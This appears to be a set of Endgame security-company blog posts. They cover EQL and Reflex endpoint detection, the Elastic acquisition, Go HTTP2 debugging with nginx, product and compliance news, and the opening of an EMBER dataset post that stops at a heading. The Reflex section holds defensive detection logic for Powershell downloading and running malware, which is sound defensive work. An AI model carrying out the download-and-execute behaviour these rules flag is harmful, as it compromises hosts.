    Organizations have a huge variety of policies they wish to enforce, from regulatory and compliance directives to self-declared, internal IT guidelines. Reflex can be used to enforce policy and block violations across a huge portion of this surface, and its customizability is necessary given how varied IT and security policies are between organizations.

    The universe of possible Reflexes in this area is nearly endless, but we’ll briefly cover one illustrative example.

    Reflex 3

    This simple EQL is deployed in an environment that doesn’t want to allow any unsigned process to execute outside of the base Windows and Program Files folders. This restrictive policy would block many unwanted applications or pieces of potential malware. One can imagine how to extend this into a huge number of other use cases - blocking execution from network shares, restricting to a set of named applications, only allowing network connections from allowed applications, and much more.

    Matching across event types

    In security it is necessary to flexibly join and match across event types in order to ask the right security-relevant questions. EQL and Reflex support this in a straightforward and performant manner. One example use case follows.

    Reflex 4

    This query joins across three different event types: file, process, and network. It fires when a process executes whose backing file was dropped by a Powershell process that talked on the network. Why does this matter? Powershell is often used as a mechanism to download and run malware which the adversary hosts on the internet. The attacker gains execution, runs a short Powershell command to grab a file from the network, and then that file is executed. It is trivial to link all of these events together with EQL, and using the overall Reflex engine we can isolate the compromised host, delete the dropped file, and kill all related processes effectively in real time, with no cloud connection or round trip required.
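    The join logic reads naturally as a chain of lookups. As a toy illustration (again, not the EQL in the figure or the Reflex engine), the Python sketch below links a process execution to the file backing it and to a Powershell process that both talked on the network and dropped that file.

    # Toy sketch of the cross-event join: network activity -> dropped file -> execution.
    # Process ids and paths are fabricated for the example.
    powershell_with_network = {"ps-42"}                         # Powershell processes seen on the network
    files_dropped_by = {r"c:\users\bob\update.exe": "ps-42"}    # file path -> dropping process id

    def suspicious_execution(event):
        """event: a process-start event carrying the path of its backing image."""
        dropper = files_dropped_by.get(event["image_path"].lower())
        return dropper is not None and dropper in powershell_with_network

    event = {"pid": 512, "image_path": r"C:\Users\bob\update.exe"}
    if suspicious_execution(event):
        print("process backed by a Powershell-downloaded file just executed")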
     

    Summary

    Reflex changes the game for defenders, allowing for configurable, real-time, cloud-less prevention across Windows, Mac, and Linux. Security teams want control, and they want prevention without complexity, delay, or friction between totally separate tools. Reflex provides all of that in a straightforward and performant package. If you’d like a demo, click here to get in touch.

    Joining Forces with Elastic


    We are excited to announce that Endgame has entered into an acquisition agreement to join forces with Elastic N.V. (NYSE: ESTC). Together, we will bring to market a holistic security product that combines endpoint and SIEM, and is delivered via Elastic’s unique go-to-market model.

    The Endgame Story

    Endgame’s mission is to protect the world’s data from attack. We’ve been driven by a conviction that even the best of existing prevention technologies are complicated, costly, and available only to a select few, while legacy solutions repeatedly fail to stop the theft or ransom of valuable data.

    Our goal is to elevate and empower users at all levels of expertise and experience. To help us do that, we built Artemis, the industry's first natural-language security chatbot, Resolver, a unique attack visualization technology, and Reflex powered by EQL (Event Query Language), the first language to describe adversary behavior and customized response.

    We have been gratified by the third-party recognition and customer validation this approach has garnered. Wherever possible, we have shared fundamental research with the world -- open-sourcing EQL, providing malware model training data, and adding our anti-malware technologies to VirusTotal for all to use. And through it all, we have been amazed time and again by the feedback from our users and customers who rely on Endgame to protect some of their most valuable assets.

    Our Shared Future

    The natural next step in the evolution of our company is to get this endpoint platform into the hands of those who need it most – more hands than we could find on our own.

    As we investigated ways to accelerate our community engagement, we noticed that we were receiving more and more requests to integrate with Elastic. Our users knew that the only way to stop damage and loss was to have leading prevention coupled with endpoint detection and response (EDR). They were frustrated by limits on their ability to retain, search, and respond to the history of their security events, and so they were naturally turning to Elastic for their expertise in search. Of course, we already knew first-hand the power Elastic could bring to security since it serves as the core of our Endgame platform.

    We quickly came to believe that there was a huge benefit to both parties in joining forces. Endgame would gain an ability to get our endpoint technology into the hands of dev ops, security practitioners, and IT users throughout the world, and Elastic would gain access to endpoint telemetry in the market in order to enhance a security use-case their users were already embracing.

    It was a natural fit.

    Most importantly, both companies and teams share the same core values and the same relentless focus on the success of our users. With the power of Elastic, we will continue to provide the best endpoint protection we can, while also accelerating the integration of our data into our users’ Elastic Stacks, empowering actionable security.

    Our CTO, Jamie Butler, says it well: “In information security, nothing is more critical to comprehensive protection than access to rich, actionable data in real-time. The combined force of Elastic’s powerful data platform and Endgame’s award-winning endpoint security offering gives customers strong insight into their data. Both organizations share a commitment to openness, transparency, and user enablement, making this an exciting opportunity for both our employees and for the joint user community. The combination of our solutions will change how the world thinks about data, analytics, and security.”

    There is so much we can do together.

    We are excited by the opportunity to converge SIEM and endpoint technologies to drive a whole new level of collaboration for security teams.  Our users are rapidly adopting the Elastic Stack as the most useful destination for their security information, and together we can ensure a first-class experience when integrating Endgame’s robust security data in Elastic Common Schema (ECS) into the Stack.

    Additionally, users love Endgame’s ability to bubble-up the information that matters within their security data. For example, Resolver provides a visual representation of the full extent of the attack, allowing users to do root-cause analysis easily, and to build effective response plans regardless of their level of expertise. Now, we can use the power of Kibana to provide even more dashboard and visualization capabilities, further enabling users to see and respond to what matters quickly.

    I am hugely impressed by the vision, ambition, humility, and expertise of the Elastic team and I cannot wait for our joint users to see the capabilities we believe we can bring together. This is only the beginning, and the perfect closing to this note is with a glimpse of the future from Elastic’s Founder and CEO, Shay Banon: “It's been a humbling experience to get to know the Endgame team. We are very aligned on a go-to-market strategy and building solutions that combine our search technology with Endgame's endpoint product to give users the best possible threat hunting, SIEM and endpoint experience. We are excited for the opportunity to join forces with Endgame and welcome the Endgame team to Elastic and our community.”

    Additional Information and Where to Find It

    Elastic N.V. (“Elastic”) plans to file with the Securities and Exchange Commission (the “SEC”), and the parties plan to furnish to the security holders of Endgame, Inc. (“Endgame”) and Elastic, a Registration Statement on Form S-4, which will constitute a prospectus of Elastic and will include a proxy statement of Elastic in connection with the proposed merger of Avenger Acquisition Corp., a Delaware corporation and a direct wholly-owned subsidiary of Elastic (“Merger Sub”) with and into Endgame (the “Merger”), whereupon the separate corporate existence of Merger Sub shall cease and Endgame shall continue as the surviving corporation of the Merger as a direct wholly-owned subsidiary of Elastic.  The prospectus/proxy statement described above will contain important information about Elastic, Endgame, the proposed Merger and related matters.  Investors and security holders are urged to read the prospectus/proxy statement carefully when it becomes available.  Investors and security holders will be able to obtain free copies of these documents and other documents filed with the SEC by Elastic through the website maintained by the SEC at www.sec.gov.  In addition, investors and security holders will be able to obtain free copies of these documents from Elastic by contacting Elastic’s Investor Relations by telephone at +1 (650) 695-1055 or by e-mail at ir@elastic.co, or by going to Elastic’s Investor Relations page at ir.elastic.co and clicking on the link titled “SEC Filings” under the heading “Financials.”  These documents may also be obtained, without charge, by contacting Endgame’s COO and General Counsel by telephone at +1 (703) 650-1264 or by e-mail at dsaelinger@endgame.com.

    The respective directors and executive officers of Endgame and Elastic may be deemed to be participants in the solicitation of proxies from the security holders of Elastic in connection with the proposed Merger.  Information regarding the interests of these directors and executive officers in the transaction described herein will be included in the prospectus/proxy statement described above.  Additional information regarding Elastic’s directors and executive officers is included in Elastic’s proxy statement for its Extraordinary General Meeting of Shareholders, which was filed with the SEC on March 28, 2019. This document is available from Elastic free of charge as described in the preceding paragraph.

    Forward-Looking Statements

    This communication contains forward-looking statements which include but are not limited to: Elastic’s ability to offer a comprehensive security solution focused on endpoint security and integrated with Elastic’s existing security efforts; Endgame’s EDR and EPP capabilities, in combination with Elastic’s security efforts, will help organizations extend threat hunting to the endpoint; the benefit to Elastic customers of deploying Endgame’s product; the benefit to Endgame customers of deploying the Elastic Stack; our ability to successfully integrate our products, technologies and businesses; the ability to use Elastic search technology in combination with Endpoint data; our ability to successfully align our product roadmaps and go-to-market strategy; customer acceptance of our combined product lines and the value proposition of our combination; the future conduct and growth of our business and the markets in which we operate; our ability to obtain necessary regulatory approvals to close the Merger; our ability to obtain shareholder approval for the Merger; and the expected timing of the proposed Merger. These forward-looking statements are subject to the safe harbor provisions under the Private Securities Litigation Reform Act of 1995.  Our expectations and beliefs regarding these matters may not materialize. Actual outcomes and results may differ materially from those contemplated by these forward-looking statements as a result of uncertainties, risks, and changes in circumstances, including but not limited to risks and uncertainties related to: the ability of the parties to consummate the proposed Merger, satisfaction of closing conditions precedent to the consummation of the proposed Merger, potential delays in consummating the Merger, and the ability of Elastic to timely and successfully achieve the anticipated benefits of the Merger. Additional risks and uncertainties that could cause actual outcomes and results to differ materially from those contemplated by the forward-looking statements are included under the caption “Risk Factors” and elsewhere in our most recent filings with the SEC, including our Quarterly Report on Form 10-Q for the fiscal quarter ended January 31, 2019 and any subsequent reports on Form 10-K, Form 10-Q or Form 8-K filed with the SEC. SEC filings are available on the Investor Relations section of Elastic’s website at ir.elastic.co and the SEC’s website at www.sec.gov. Elastic assumes no obligation to, and does not currently intend to, update any such forward-looking statements after the date of this release, except as required by law.


    Investigating HTTP2 performance with Go


    At Endgame Engineering, experience has shown us that small errors in the edge cases of web service connection lifecycles can eventually contribute to production outages. So we believe it’s worth the time to exhaustively investigate bugs that we don’t understand and also explore related areas in the code to resolve issues before customers are impacted.

    This case study will walk through the identification, investigation, and resolution of errors that we identified in our data streaming pipeline. We will discuss how we use Go and nginx in our tech stack and the lessons we learned while debugging and tuning their HTTP2 performance, as well as some general lessons we learned about debugging these sorts of issues.

    Background

    Endgame has made it a priority to invest in observability for our customers that are using the Endgame platform. We collect telemetry information about the health of our cloud hosted and on-premises installations and consolidate that information into a centralized data streaming pipeline. We apply streaming analytics on the data to monitor performance trends and product efficacy. Our engineering, customer support, and research teams use the data to regularly roll out improvements to the product.

    At a high-level, the pipeline consists of:

    1. Several data collection services which run on customer platform instances and gather telemetry data.

    2. A NATS streaming server on each local platform that queues data for transmission.

    3. A gateway service written in Go that establishes a secure HTTPS connection to the Endgame cloud backend using mutual TLS (mTLS). It streams messages from the local queue to our hosted environment.

    4. An nginx server in our hosted environment that terminates the HTTPS connection and forwards messages to a data streaming platform.

    5. Several downstream data consumers that post-process the information for consumption by our internal support teams.

    The communication between our deployed platforms and the hosted environment happens over an HTTP2 protocol connection. We chose to use HTTP2 because of its superior compression and performance for high-throughput pipelined communications. Furthermore, HTTP2 is a broadly adopted industry standard, which allows us to easily integrate client and server technologies without custom code.

    Symptoms

    We noticed several of our cloud hosted platforms reporting this error message in their logs with increasing frequency:

    ERR Failed to send 'endpoint-health' message to cloud from queue 'feedback.endpoint-health': Post
    https://data.endgame.com/v2/e/data-feedback/endpoint-health: http2: Transport: cannot retry err [http2:
    Transport received Server's graceful shutdown GOAWAY] after Request.Body was written; define
    Request.GetBody to avoid this error

    It became apparent that this was a growing issue as the frequency of this error closely aligned with the increasing overall messages per second received by our data streaming backend. We used the AWS log search tool mentioned in an earlier blog post to confirm that the error was occurring broadly across many platforms. This led us to believe that the error was trending with overall data volume. Since we are regularly adding new telemetry and new customers, we concluded that the problem would most likely continue to worsen over time.

    We were concerned that this error message represented data loss which would impact our customer support teams that rely on the data. Thankfully, we have retry logic at the application level that ensured these intermittent errors did not cause data loss. In order to ensure that the increasing error rate would not cause data loss in the future, we set out to determine why HTTP2 connections were regularly dropping.

    Reproduction

    The clear and unique error message from the Go HTTP2 library enabled us to immediately identify the place in the code where the error originated. This told us two things: First, we were misusing the Go HTTP2 transport somehow. And second, our nginx server was returning unexpected GOAWAY messages.

    We worked backward from the error message to produce a small Go function that would reproduce the problem:

    doRequest := func(url string) error {
        req, _ := http.NewRequest("POST", url, nil)
        // Setting Body directly (rather than passing the body to NewRequest) leaves
        // the transport with no way to replay the body if the connection is closed.
        req.Body = ioutil.NopCloser(bytes.NewReader([]byte("{}")))
        resp, err := http.DefaultClient.Do(req)
        if resp != nil {
            defer resp.Body.Close()
        }
        return err
    }
    var wg sync.WaitGroup
    for i := 0; i < 1001; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            err := doRequest("https://data.endgame.com/v2/e/data-feedback/endpoint-health")
            if err != nil {
                fmt.Printf("HTTP error: %v\n", err)
            }
        }()
    }
    // Wait for all in-flight requests to finish before returning.
    wg.Wait()

    NOTE: We’ve excluded some domain name and TLS configuration details from this example that are required to authenticate with our servers. If you run this example yourself you’ll see a slew of HTTP 403 errors and probably some TLS connection errors as well.

    Running this code produced the output we expected:

    HTTP error: Post
    https://data.endgame.com/v2/e/data-feedback/endpoint-health: http2: Transport: cannot retry err [http2:
    Transport received Server's graceful shutdown GOAWAY] after Request.Body was written; define
    Request.GetBody to avoid this error

    In our original implementation we used the Request.Body field to prepare a call to the Client.Do function. This turned out to be the source of the error, since the Go client does not have enough information to retry the request. The Request.Body field expects an io.ReadCloser, and the transport closes that reader after the first attempt, so there is nothing left to resend. If we instead pass an io.Reader to the request constructor, http.NewRequest, the constructor recognizes common in-memory readers (such as *bytes.Buffer, *bytes.Reader, and *strings.Reader) and prepares the data structures needed to replay the body, which lets the transport retry the request automatically.

    So, the fixed doRequest function is:

    doRequest := func(url string) error {
               // Passing an io.Reader to http.NewRequest lets the constructor
               // set up Request.GetBody, so the transport can retry safely.
               req, _ := http.NewRequest("POST", url, bytes.NewBufferString("{}"))
               resp, err := http.DefaultClient.Do(req)
               if resp != nil {
                    defer resp.Body.Close()
               }
               return err
    }
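
    The error message also points at an alternative fix: if the body really must be attached by hand, defining Request.GetBody gives the transport a way to re-create the body so it can retry. A minimal sketch of that approach, with a placeholder payload:

    doRequestManual := func(url string) error {
               payload := []byte("{}")
               req, err := http.NewRequest("POST", url, nil)
               if err != nil {
                    return err
               }
               req.Body = ioutil.NopCloser(bytes.NewReader(payload))
               req.ContentLength = int64(len(payload))
               // GetBody hands the transport a fresh copy of the body, so the
               // request can be replayed after the server sends GOAWAY.
               req.GetBody = func() (io.ReadCloser, error) {
                    return ioutil.NopCloser(bytes.NewReader(payload)), nil
               }
               resp, err := http.DefaultClient.Do(req)
               if resp != nil {
                    defer resp.Body.Close()
               }
               return err
    }

    We preferred the http.NewRequest approach above because it keeps the call site simpler, but both forms give the HTTP2 transport what it needs to retry.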

    We learned a few important points while working through the reproduction:

    • The error only occurred if we ran many requests in parallel with goroutines. The HTTP client in Go is thread-safe, so generally we would expect it to work fine in parallel. This indicated that the error was related to the way that the connection was being closed by the server while several requests were in flight.

    • The error always occurred on the 1,001st request.

    To better understand the HTTP2 traffic, we re-ran the reproduction with the GODEBUG=http2debug=2 environment variable, which is built into the net/http library. This provided more detail on the exact cause of the error. The 1,000th request included this unique logging information:

    http2: Framer 0xc0003fe2a0: wrote HEADERS flags=END_HEADERS stream=1999 len=7
    http2: Framer 0xc0003fe2a0: wrote DATA stream=1999 len=2 data="{}"
    http2: Framer 0xc0003fe2a0: wrote DATA flags=END_STREAM stream=1999 len=0 data=""
    http2: Framer 0xc0003fe2a0: read GOAWAY len=8 LastStreamID=1999 ErrCode=NO_ERROR Debug=""
    http2: Transport received GOAWAY len=8 LastStreamID=1999 ErrCode=NO_ERROR Debug=""
    http2: Framer 0xc0003fe2a0: read HEADERS flags=END_HEADERS stream=1999 len=115

    This made it clear that the server was sending a GOAWAY frame with LastStreamID=1999. Client-initiated HTTP2 streams use odd IDs, so stream 1999 corresponds to our 1,000th request. The HTTP2 spec further clarifies that GOAWAY is how an endpoint, in this case the server, explicitly initiates shutdown of a connection.

    Tuning NGINX HTTP2 Settings

    Clearly, nginx was closing HTTP2 connections after the 1,000th request. This clue was detailed enough to find an old Go issue referencing the same problem. It validated our finding that the behavior occurs specifically with nginx when requests happen in parallel over the same HTTP2 connection. The Go team fixed the library in 2016 (and again in 2018) to better handle this specific behavior.

    The conversations in these issues confirmed that nginx was closing the connection due to the http2_max_requests setting in the nginx http2 module, which defaults to 1000.

    An nginx issue opened in 2017 discussed ways to handle this setting for long-lived connections. In our use case, we expect to have HTTP2 connections open for a long time as messages are streamed to the server. It seemed like the best course of action would be to set http2_max_requests to a large value (say, 1 million) and accept that nginx would regularly close connections.
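
    For reference, the change amounts to a one-line directive in the nginx http2 module configuration. A hedged sketch, where the surrounding context is illustrative rather than our exact production config:

    server {
        listen 443 ssl http2;

        # nginx closes an HTTP2 connection with GOAWAY after this many
        # requests; the default of 1000 was far too low for our streaming
        # workload, so we raised it to 1 million.
        http2_max_requests 1000000;

        # certificate, proxy, and logging settings omitted
    }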

    Digging Deeper

    We could claim that the Go client http.Request constructor and possibly also the nginx setting was the “root cause” and be done with the investigation. But at Endgame we emphasize an engineering culture that values tenacity and technical excellence, and we agree with John Allspaw and many others that “there is no root cause” in complex systems. Rather, incidents have several contributing causes that emerge from unexpected events and decisions by engineers over time as they build and maintain an overall system.

    So we asked: if we didn’t know about this nginx setting, what else did we not know about HTTP2 performance that might be contributing to connection drops and other performance issues? We knew that the original error message, "define Request.GetBody to avoid this error", indicated that we had misconfigured our Go client in at least one way, and we suspected that there could be other similar issues lurking.

    So, we made two changes to our test environment as preparation for further study:

    • Revise our use of Go http.Client so that we use the proper http.NewRequest constructor.

    • Apply the nginx http2_max_requests setting, raised to 1 million.

    With these changes, we could confirm that our reproduction code did not trigger the original error, and with debugging on we could also confirm that nginx did not send a GOAWAY frame on the 1,000th request.

    Early in the investigation, we observed that this error scenario was becoming more common as message volume increased. We assumed that under low-load conditions, the HTTP2 client would go for extended periods without any messages to send, and the connection would naturally time out and close. We decided to test that assumption with a simple function that sends a single message and then waits:

    doRequest("https://data.endgame.com/v2/e/data-feedback/endpoint-health") // same function as the earlier example
    time.Sleep(100 * time.Hour)

    Again, the Go GODEBUG=http2debug=2 environment variable helped us watch the HTTP2 connection lifecycle. An abridged log looked like this:

    ...
    2019/05/22 16:23:15 http2: Framer 0xc0001722a0: wrote HEADERS flags=END_HEADERS stream=1 len=65
    2019/05/22 16:23:15 http2: Framer 0xc0001722a0: wrote DATA stream=1 len=2 data="{}"
    ...
    2019/05/22 16:23:15 http2: decoded hpack field header field ":status" = "200"
    ...
    2019/05/22 16:23:15 http2: Transport received HEADERS flags=END_HEADERS stream=1 len=111
    2019/05/22 16:26:15 http2: Framer 0xc00015c1c0: read GOAWAY len=8 LastStreamID=1 ErrCode=NO_ERROR Debug=""
    2019/05/22 16:26:15 http2: Transport received GOAWAY len=8 LastStreamID=1 ErrCode=NO_ERROR Debug=""
    2019/05/22 16:26:15 http2: Transport readFrame error on conn 0xc000424180: (*errors.errorString) EOF
    ...

    On the one hand, this was exactly what we expected to see: eventually the connection times out and is closed. On the other hand, it was a surprise, because it is the server that closes the connection after three minutes via the now-familiar GOAWAY frame. That matches the nginx http2_idle_timeout directive, which defaults to three minutes - but why doesn’t the Go client close the idle connection itself? According to the Go docs, IdleConnTimeout in the default transport is 90 seconds.

    Remember earlier when we mentioned that this service uses mutual TLS? Looking over the code, we found that we were taking a naive approach to instantiating the HTTP client, essentially using code like this:

    var tlsCfg tls.Config

    // initialize the proper client and server certificates...

    client := http.Client{
         Timeout:   30 * time.Second,
         Transport: &http.Transport{
               // TLSClientConfig takes a *tls.Config
               TLSClientConfig: &tlsCfg,
         },
    }
    
    // use client for HTTP POST requests...

    We had remembered to explicitly set an HTTP client timeout. As explained in this informative blog post, if we initialize an http.Client but don’t set the Timeout field, the client will never time out HTTP requests. But our experiment showed that the same "infinite timeout" default exists for other settings as well, and we had not set those properly. In particular, http.Transport.IdleConnTimeout defaults to 0, which means the transport keeps idle connections open forever.

    So, we revised our code to explicitly define the transport-level defaults to match the suggested defaults in the Go http.DefaultTransport:

    client := http.Client{
          Timeout:   30 * time.Second,
          Transport: &http.Transport{
               MaxIdleConns:          100,
               IdleConnTimeout:       90 * time.Second,
               TLSHandshakeTimeout:   10 * time.Second,
               ExpectContinueTimeout: 1 * time.Second,
               TLSClientConfig:       &tlsCfg,
          },
    }

    Running our experiment again, we confirmed that the Go client closed the connection itself after 90 seconds:

    2019/05/22 17:45:24 http2: Framer 0xc0002641c0: wrote HEADERS flags=END_HEADERS stream=1 len=65
    2019/05/22 17:45:24 http2: Framer 0xc0002641c0: wrote DATA stream=1 len=2 data="{}"
    ...
    2019/05/22 17:45:24 http2: decoded hpack field header field ":status" = "200"
    ...
    2019/05/22 17:46:54 http2: Transport closing idle conn 0xc00022d980 (forSingleUse=false, maxStream=1)

    At this point, we felt much more comfortable that we were handling the HTTP2 lifecycle correctly on both the client and server.

    Conclusion

    The exploration of this bug taught us several general lessons about this sort of issue.

    Don’t forget about default values in Go HTTP!

    Many people have written about configuring various HTTP settings in Go. We are glad that we were able to learn this lesson without experiencing a production outage due to our misconfiguration, and appreciate the other contributions that people have made to the community by documenting best practices.

    Reproduction is worth the time

    We could easily have silenced this specific error by defining the Request.GetBody method and assuming the problem was solved. But in reality, that would have masked several places in code where we had misconfigured our client and server relative to our production workloads. Working through a minimal reproduction identified the exact behavior necessary to trigger the bug and pointed us to other code changes that would improve the performance and stability of the data pipeline.

    Open source greatly speeds up debugging and fixing issues

    Thanks to a well-written error message we were able to explore the exact location in the Go source code that triggered our bug. Reading through that code and related locations (like the constructor for http.Request) is what taught us how to properly utilize these objects to refactor our code appropriately. Without open source, we would have worked around the bug but not truly understood the underlying logic.

    Getting Things Done with Endgame 3.10


    Cyber security.  It’s not always about hunting down the bad guys and gals.  Sometimes you just gotta get things done, but getting things done is hard.  There are many, many vendors in the EDR/EPP space that have a well-founded reputation for being hard to implement without services, and for being too time consuming to run. 

    Our June release here at Endgame, version 3.10, brings a renewed focus on getting things done efficiently, accurately, and fast.

    Adversarial Behavior Whitelisting

    Over the past couple of years, many EDR customers have ended up with buyer’s remorse.  They realize that once professional services have packed up and gone home, they can’t use the product.  Much of this is because most vendors like to stick to that old black box secrecy approach. 

    Much has been said about ATT&CK matrix coverage, for example, and what it means to have a strong alignment with ATT&CK.  Vendors want to focus on big numbers like 100% coverage of this, or 100% prevention of that.  They spend none of their marketing time telling you that a lot of adversarial behavior can be GOOD behavior, just like MS Powershell can be used for good and bad.  Trying to detect every possible adversary behavior is going to light up your alerts and notifications like Clark W. Griswold’s holiday lights, and have your team chasing their tails until they can’t take it anymore. 

    I’m lucky enough to spend time working in our SOC, triaging alerts and looking for true and false positives.  What’s been most interesting is how much time I spend investigating suspicious activity that turns out to be totally fine and expected, and probably would not have taken more than a few moments’ attention if I worked at that organization myself. 

    For example, a configuration management tool like IBM’s Tivoli Application Dependency Discovery Manager – what a name – can look VERY suspicious when it uses remote WMI calls to run asset discovery tasks. If that was my environment, I would use my local knowledge to say, “yup, this is expected.” Without that knowledge, it looks a lot like lateral movement – see ATT&CK ID T1028 – and running processes from unusual paths looks like defense evasion. 

    What’s great about Endgame’s new whitelisting capability is that I can stop those alerts from coming up by using a very specific whitelist for that specific adversarial tactic. So, if Endgame detects this behavior originating from a specific IP address, under a specific user account, for a specific process path, we can safely suppress the alerts from firing and leave the security team to investigate other issues.   

    Every single organization’s environment is different, and every security tool is going to need tuning and configuring.  Anyone that tells you that everything works out-of-the-box is probably selling something useless.  The difference is in the user experience, and this is how Endgame continues to bring more advanced capabilities to security teams of all sizes. 

    See for yourself, visit endgame.com/demo

    Endgame Completes Successful SOC 2 Compliance Audit


    Today, Endgame is excited to announce that we have successfully completed the Service Organization Control (SOC) 2 Type 1 audit. Conducted by an independent third party, the audit affirms that Endgame’s information security policies, procedures and controls meet the SOC 2 standard for security, availability and confidentiality. This certification applies to all Endgame processes and procedures currently handling production workloads. 

    Developed by the American Institute of Certified Public Accountants (AICPA), SOC 2 certification is widely recognized as the gold standard for data security and requires companies to establish and follow strict information security policies and procedures.  

    The SOC 2 examination verifies the existence of internal controls to meet the requirements for the security principles set forth in the Trust Services Principles and Criteria for Security. It provides a thorough review of how Endgame’s internal controls affect the security and availability of the systems it uses to process users’ data, and the confidentiality of the information processed by these systems. This independent validation of security controls is crucial for customers in highly regulated industries. 

    Endgame's SOC 2 Type 1 certification demonstrates our commitment to data security through the practices and procedures we follow for protecting against unauthorized access, maintaining the availability of our service, and protecting the confidential information of customers. 

    Endgame understands and appreciates the trust that our customers have in us to ensure the privacy and security of their data.  We have invested extensively in meeting and exceeding these expectations, including through our support of customers’ GDPR and CCPA compliance goals; our institution and enforcement of rigorous internal controls and standards associated with data access and availability; and our offering of multiple deployment options including an on-premises approach.   

    Our successful completion of the SOC 2 audit without any qualification or condition represents an additional step in showing how important data privacy is to our mission.  It is not only an important milestone for our team, but also evidence of Endgame’s ongoing commitment to always deliver exceptional service to our customers.   Effective today, current and prospective customers can request a copy of the SOC 2 attestation letter and other materials related to our data privacy practices from their sales associate. 

    For more information or to schedule a demo, visit: https://pages.endgame.com/request-demo-website.html 

    EQL’s Highway to Shell


    It has been an exciting summer in the security community for the Event Query Language (EQL) as we delivered presentations at Circle City Con and Bsides San Antonio. These talks showcased creative ways to hunt for adversaries in your environment with EQL.  If you couldn't make either of these events, we are sorry we missed you, but good news: EQL is making its way to Blackhat USA in a joint talk with Red Canary called "Fantastic Red-Team Attacks and How to Find Them". We hope to see you there at the presentation or at Endgame’s booth (#1253) to talk more about behavior based detection with EQL.  In advance of Blackhat, we’re excited to announce today’s release of more EQL analytics and tooling to make EQL even more usable and powerful.

    Before we review the exciting updates to EQL, let's pause for a quick recap. EQL was built by Endgame to express relationships between events. The language is data source and platform agnostic, can answer stateful questions, and enables the hunter by including data stacking pipes to sift through data. If you have structured data, you can start asking questions now.  For more background, please see the following posts: Introducing EQL, EQL For the Masses, and Getting Started with EQL.
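
    To give a flavor of the language, here is the kind of stateful question EQL can express. This is only an illustrative sketch; the event types and field names (unique_pid, process_name) are placeholders that depend on your own schema:

    sequence by unique_pid
      [process where process_name == "whoami.exe"]
      [network where true]
    | head 5

    The sequence matches a whoami.exe process event followed by network activity attributed to the same process, and the head pipe keeps only the first five matches.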

    With today’s update to 0.7, we added an interactive shell so you can better explore your own data. It will dynamically learn your schema, and includes tab-completion, syntax highlighting, table output, helpful error messages, and the ability to export results from a search to a CSV file.

    In addition to the improved EQL experience, we also added over 60 new analytics to our Analytics Library.  The goal of these new analytics is to help you enrich your data and gain context by matching high-noise MITRE ATT&CK™ techniques against your security events.  Finally, we’ve updated our contribution guides, making it easier to contribute to the EQL community. 

    Interactive Shell

    We’re happy to make a powerful shell available to improve your experience with EQL. It is included with EQL, so after you install EQL 0.7 (pip install eql), you can use the shell to quickly explore your own data set. It has syntax highlighting and supports queries that span multiple lines. You can define a schema or teach it to learn your schema in order to validate your queries.  We also provide a powerful table viewer for readability and flexibility of query results. With the shell, you can tab complete through EQL keywords, EQL functions, and even your own data fields. 

    Let's show some examples using the interactive shell by running the command eql. First, here’s a quick video.

    Figure 1: A quick video of the EQL shell, showing features such as importing data, tab completion, type/field/syntax checking, table output, and more.

    Let’s highlight a couple of features. For instance, tab completion is very useful for quickly building an EQL query or discovering the available fields in your data.

    Figure 2: Tab completion of EQL functions and data fields within EQL Shell

    Additionally, the table output is a powerful way to customize your EQL match results. During alert triage, it can be helpful to quickly build pivot tables and narrow your investigation.

    Figure 3: EQL table showing query results.

    Check out the documentation for more information and ways to use the EQL shell.  We hope you enjoy it as much as we do!

    Improved Query Validation

    In the Endgame product, we recently gave our users the ability to create their own realtime detections with EQL. As part of this work, we updated EQL to include a system for detecting query errors (this functionality is available in the EQL shell as well). If you try to create a query with an unknown function, event type or field, EQL will tell you exactly where you went wrong, with a helpful message indicating the root problem. We also added a type system to the internals of EQL, and now you'll get more concise and useful errors if you pass the wrong type to a function, or try to compare across types.

    Figure 4: Schema and type validation in core EQL. The first example shows an error for the field cmdline, which did not exist in our data; the second shows a type error, since the length function expects an array or string.

    Enriching with EQL

    Security isn’t always about alerting. Contextualizing an alert to further comprehend what’s happening is a great way to help security analysts go from reacting to yet another alert to understanding a potential incident. We can provide better context by enriching logs with ATT&CK™ tactics and techniques.  This isn't the same thing as positively identifying something as malicious, but it enhances raw data with critical information for performing triage or finding trends in lower confidence detections. 

    Attackers often use native OS tools for their own purposes, tradecraft known as living off the land.  It can be difficult for defenders to separate malicious intent from benign usage of an administrative tool, but regardless of the intent, execution of these tools is noteworthy.  By enriching this data when it is seen, we may notice that some seemingly benign actions represent more nefarious intent when viewed collectively. Or, defenders may use labels to prioritize and rank event collections that include certain enrichments. Either way, the crux is labeling security data, and we provide a solution with EQL.

    We are releasing over 60 analytics to the EQL Analytics Library.  These are categorized as enrichments so you can start labeling your data or even start hunting for suspicious behaviors in your environment. Additionally, they are all mapped to MITRE ATT&CK™!  These queries work better as enrichment labels than as alerting detections.  A majority have high potential for noise and could represent legitimate activity, but if you’ve been struggling to enhance your coverage of ATT&CK™ without success, this kind of enrichment can help you get a great deal closer.  Going further, if you understand normal baseline activity in your environment, you could selectively choose which EQL queries could act as detections for you and use them accordingly.  

    Figure 5: An example of using eqllib to survey a dataset and return analytic matches. We could use this as a means to prioritize our triage by count.

    Endgame provides enrichments to our users.  Attack timelines that come back with alerts are enriched with additional ATT&CK™-based context displayed to the user.  This helps our users understand their alerts and take appropriate actions.

    Figure 6: Enrichment in the Endgame platform (click image for larger view)

    How to Contribute to EQL

    And finally, we want to collaborate with you, so we updated our contribution guides (EQL and the Analytics Library). Our intention is to provide a clear path for you to contribute to the EQL Analytics Library or the language directly. We recommend that everyone follow a basic git development workflow by creating branches and submitting pull requests, and we added plenty of useful help docs to assist. We also created templates to make the process as painless as possible.

    We pledge to be timely in our review of all submitted work. And of course, always feel free to reach out and communicate with the EQL team via chat on Gitter, on Twitter (@eventquerylang) or with Github issues.

    We hope to work with you soon!

    Extending EMBER


    Last year, Endgame released an open source benchmark dataset called EMBER (Endgame Malware BEnchmark for Research). EMBER contains sha256 hashes of 1.1 million portable executable (PE) files scanned in or before 2017, features extracted from those PE files, a benchmark model, and a code repository that makes it easy to work with this data. Since then, researchers have been able to use this dataset to quantify how quickly models degrade [1], investigate how labels evolve over time [2], and even examine how malware classifiers are vulnerable to attack [3]. We were very pleased to see this response from the community, but were also aware of a couple areas where we thought EMBER could improve.

    Today, we’d like to announce a new release of EMBER that we built with those improvements in mind. This release is accompanied by a new set of 1 million PE files scanned in or before 2018 and an expanded feature set. Here are some of the differences between this release and the original EMBER:

    More Difficult Dataset

